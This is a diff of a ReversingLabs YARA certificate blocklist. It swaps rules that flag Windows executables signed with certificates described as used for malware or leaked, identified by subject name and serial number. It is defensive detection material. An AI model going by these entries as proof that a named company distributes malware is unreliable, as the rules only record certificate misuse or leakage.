"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1091-L1106" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6c42daa8b8730541bb422ac860ec4b0830e00fdb732e4bb503054dbcae1ff6d4" score = 75 quality = 90 tags = "INFO, FILE" @@ -10212,22 +30003,22 @@ rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NANAX d.o.o." and (pe.signatures[i].serial=="00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" or pe.signatures[i].serial=="ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d") and 1613520000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Enforced Licensing Registration Authority CA (SHA1)" and pe.signatures[i].serial=="61:02:b0:19:00:00:00:00:00:2f") } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_01E2B4F759811C64379Fca0Be76D2Dce : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "c09778b6-17c9-5b24-8977-1bd998083c23" + id = "00effc8a-066c-54ff-891e-c635d161b171" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7032-L7048" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7079d4f1973ad4de21e1f88282c94b11c4d63f8bad12b35ef76a481e154d9da3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1108-L1124" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0dff7a9f2e152c20427ea231449b942a040e964cb7dad90271d2865290535326" score = 75 quality = 90 tags = "INFO, FILE" @@ -10237,22 +30028,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Toko Saya ApS" and pe.signatures[i].serial=="7d:cd:19:a9:45:35:f0:34:ee:36:af:46:76:74:06:33" and 1609200000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sony Pictures Entertainment Inc." and pe.signatures[i].serial=="01:e2:b4:f7:59:81:1c:64:37:9f:ca:0b:e7:6d:2d:ce" and 1417651200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_03E5A010B05C9287F823C2585F547B80 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "004454a0-20f9-58f5-8c24-8097f7586c5b" + id = "14ad79c7-f669-59a6-94d1-978a13fbb337" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7050-L7068" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9633f3494e9ece3a698d47c5ba2b7ee7f82cee4be36ac418c969c36285c4963c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1126-L1142" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1d57b640ee313ad4d53dc64ce4df3e4ed57976e7750cfd80d62bf9982d964d26" score = 75 quality = 90 tags = "INFO, FILE" @@ -10262,22 +30053,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ELISTREID, OOO" and (pe.signatures[i].serial=="00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" or pe.signatures[i].serial=="ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3") and 1614643200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MOCOMSYS INC" and pe.signatures[i].serial=="03:e5:a0:10:b0:5c:92:87:f8:23:c2:58:5f:54:7b:80" and 1385423999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Fe7Df6C4B9A33B83D04E23E98A77Cce : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "251212a5-95ce-5d9f-aec0-e6d3dd099349" + id = "47a10658-c5c4-58b6-b154-7babcfbc50a2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7070-L7086" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7536ec92f388234bea3b33bee4af52e0e0ce9cd86b1c8321a503f70bfe5faa76" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1144-L1160" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "da5ed07def8d0c04ea58aacd90f9fa5588f868f6d0057b9148587f2f0b381f25" score = 75 quality = 90 tags = "INFO, FILE" @@ -10287,22 +30078,22 @@ rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HOLGAN LIMITED" and pe.signatures[i].serial=="24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" and 1614729600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PIXELPLUS CO., LTD." and pe.signatures[i].serial=="0f:e7:df:6c:4b:9a:33:b8:3d:04:e2:3e:98:a7:7c:ce" and 1396310399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_065569A3E261409128A40Affa90D6D10 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "61b67e68-9e15-5848-b12a-437a0ad8399e" + id = "924c210b-f72a-51eb-af2a-9897faf8f677" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7088-L7104" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cb84b27391fa0260061bc5444039967e83f2134f7b56f9cccf6a421d4a65a577" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1162-L1178" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f8d68758704e41325e95ec69334aaf7fabe08a6d5557e0a81bac2f02d3ab5977" score = 75 quality = 90 tags = "INFO, FILE" @@ -10312,22 +30103,22 @@ rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ACTIV GROUP ApS" and pe.signatures[i].serial=="64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" and 1615507200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Police Mutual Aid Association" and pe.signatures[i].serial=="06:55:69:a3:e2:61:40:91:28:a4:0a:ff:a9:0d:6d:10" and 1381795199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0979616733E062C544Df0Abd315E3B92 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a1efbce8-3cca-5e07-a652-d67007c72a18" + id = "73222a8d-df63-5784-b5a2-0d936db8ddcb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7106-L7122" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "58a26b44e485814fa645bfa490f3442745884026bb7a70327d4f51645ad3f69c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1180-L1196" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "034b233d6b6dd82ad9fa1ec99db1effa3daaa5bb478d448133c479ac728117ad" score = 75 quality = 90 tags = "INFO, FILE" @@ -10337,22 +30128,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Seacloud Technologies Pte. Ltd." and pe.signatures[i].serial=="0a:01:a9:1c:ce:63:ed:e5:ea:a3:da:c4:88:3a:ea:05" and 1618876800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jessica Karam" and pe.signatures[i].serial=="09:79:61:67:33:e0:62:c5:44:df:0a:bd:31:5e:3b:92" and 1408319999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7D3250B27E0547C77307030491B42802 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "76999ae0-966e-5c52-8e00-a3af8afd8fae" + id = "54073485-e9a5-5a0b-a907-0e8a528da85d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7124-L7140" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c7cd84a225216ff1464a147c2572de2b0a2f69f7a315cdebef5ad2bab843b72a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1198-L1214" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "65f036921dfb9cbce3275aefb7111711e50874440096b2e3c3b55190cfc14ddb" score = 75 quality = 90 tags = "INFO, FILE" @@ -10362,22 +30153,22 @@ rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures[i].serial=="54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" and 1616371200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Banco do Brasil S.A." and pe.signatures[i].serial=="7d:32:50:b2:7e:05:47:c7:73:07:03:04:91:b4:28:02" and 1412207999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_00D1836Bd37C331A67 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c4876bdd-35bc-5a3f-9f55-9a730e7ff5c8" + id = "4d99e2ee-823e-568d-88b1-48aaf6d44286" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7142-L7160" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8f29e65b39608518d16f708faef68db37b6e179c567819dccb6681adcec262e3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1216-L1234" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8af1d10085c5be8924eb6e4ea3a9b8e936c7706d8ec43d42f24a9a293c7f9d27" score = 75 quality = 90 tags = "INFO, FILE" @@ -10387,22 +30178,22 @@ rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EKO-KHIM TOV" and (pe.signatures[i].serial=="00:f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" or pe.signatures[i].serial=="f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91") and 1598989763<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MINDSTORM LLC" and (pe.signatures[i].serial=="00:d1:83:6b:d3:7c:33:1a:67" or pe.signatures[i].serial=="d1:83:6b:d3:7c:33:1a:67") and 1422835199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2Ca028D1A4De0Eb743135Edecf74D7Af : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "909d0ce9-406c-539f-9d0e-d7ab1b277ee3" + id = "19e1bce7-ad37-5223-b934-b20e78dfd071" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7162-L7180" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "aa419bc044be55d4c94481998be4e9c0310416740084eb8376842cf5416d78bf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1236-L1252" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "60b6351194e23153d425eaa0c25f840080a29abb5eb1bbcd41bb76a3d4130edd" score = 75 quality = 90 tags = "INFO, FILE" @@ -10412,22 +30203,22 @@ rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "5 th Dimension LTD Oy" and (pe.signatures[i].serial=="00:f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" or pe.signatures[i].serial=="f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf") and 1618531200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="2c:a0:28:d1:a4:de:0e:b7:43:13:5e:de:cf:74:d7:af" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Dbb14Dcf973Eada14Ece7Ea79C895C11 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "25df791f-1128-51f9-90da-9977262d00c7" + id = "139f2e4f-7997-5cfd-aba2-dcf8d7525f5e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7182-L7200" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7f10b86f156ccac695f480661dfea8bcc455477afd9575230c2f8510327d1996" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1254-L1270" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c73c83f5cb6d840b887e1aa41e96a29529f975434ac27a5aa57f2e14b342f63d" score = 75 quality = 90 tags = "INFO, FILE" @@ -10437,22 +30228,22 @@ rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DEVELOP - Residence s. r. o." and (pe.signatures[i].serial=="00:e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" or pe.signatures[i].serial=="e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce") and 1618358400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="db:b1:4d:cf:97:3e:ad:a1:4e:ce:7e:a7:9c:89:5c:11" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F8C2239De3977B8D4A3Dcbedc9031A51 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "7c685bb7-3201-5ffc-856b-657d824595ab" + id = "3e102d0a-30e3-5f0a-9b67-a5fd15117e69" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7202-L7218" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b7c9424520afe16bd4769e1be84163ac37b8fb37433931f2e362d90cacc01093" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1272-L1288" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "aa4f39790bc58b0a50e05e7670abad654d7f3d73e500bd5f054fece4a979ebfa" score = 75 quality = 90 tags = "INFO, FILE" @@ -10462,22 +30253,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AM El-Teknik ApS" and pe.signatures[i].serial=="7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" and 1614297600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="f8:c2:23:9d:e3:97:7b:8d:4a:3d:cb:ed:c9:03:1a:51" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Caad8222705D3Fb3430E114A31C8C6A4 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "30831e91-c2aa-50bc-a0e9-ee7574fc58f4" + id = "d95b5e25-679c-57f8-b790-8f5633a23e4b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7220-L7238" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3d8075e34fa3dc221bc2abc2630a93f32efbdde6df270a77b1d6b64d8ce56133" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1290-L1306" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "35c4f46322da4f5b9f938c1098c8e57effc8abfc03db865190c343df7b8990ea" score = 75 quality = 90 tags = "INFO, FILE" @@ -10487,22 +30278,22 @@ rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FoodLehto Oy" and (pe.signatures[i].serial=="00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" or pe.signatures[i].serial=="d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b") and 1614297600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="ca:ad:82:22:70:5d:3f:b3:43:0e:11:4a:31:c8:c6:a4" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B191812516E6618D49E6Ccf5E63Dc343 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "0ef4ce5c-b2a1-59e8-8d39-3cf7ab9fd0e1" + id = "8f316011-9a29-5366-a26a-1fe20651ef17" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7240-L7258" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a371092cbf5a1a0c8051ba2b4c9dd758d829a2f0c21c86d1920164a0ae7751e6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1308-L1324" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "40c03e683b4b8e8a23ca84da7dfd3bd998d3708b27b7df7a22f25fb364c3a69b" score = 75 quality = 90 tags = "INFO, FILE" @@ -10512,22 +30303,22 @@ rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GLG Rental ApS" and (pe.signatures[i].serial=="00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" or pe.signatures[i].serial=="80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69") and 1615507200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="b1:91:81:25:16:e6:61:8d:49:e6:cc:f5:e6:3d:c3:43" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4Ba7Fb8Ee1Deff8F4A1525E1E0580057 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "e45d66b0-58ae-5054-b0a7-47a001daac7a" + id = "af912c64-334d-51f5-8ca4-707fcec512ba" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7260-L7276" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ce6c07b8ae54db03e4fa2739856a8d3dc2051c051a10c3c73501dad4296dde97" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1326-L1342" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "324157b9fec2653cb8874c7a1a5b6e39b121992cd52856b8c4a2a8b7cee86a69" score = 75 quality = 90 tags = "INFO, FILE" @@ -10537,22 +30328,22 @@ rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SFB Regnskabsservice ApS" and pe.signatures[i].serial=="3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" and 1614816000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="4b:a7:fb:8e:e1:de:ff:8f:4a:15:25:e1:e0:58:00:57" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2Df9F7Eb6Cdc5Ca243B33122E3941E25 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "b9e6a35f-08c2-5f29-9bcf-07a3cddf0fbe" + id = "da1895fd-ec29-513d-b8ae-2317f84b8280" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7278-L7294" - 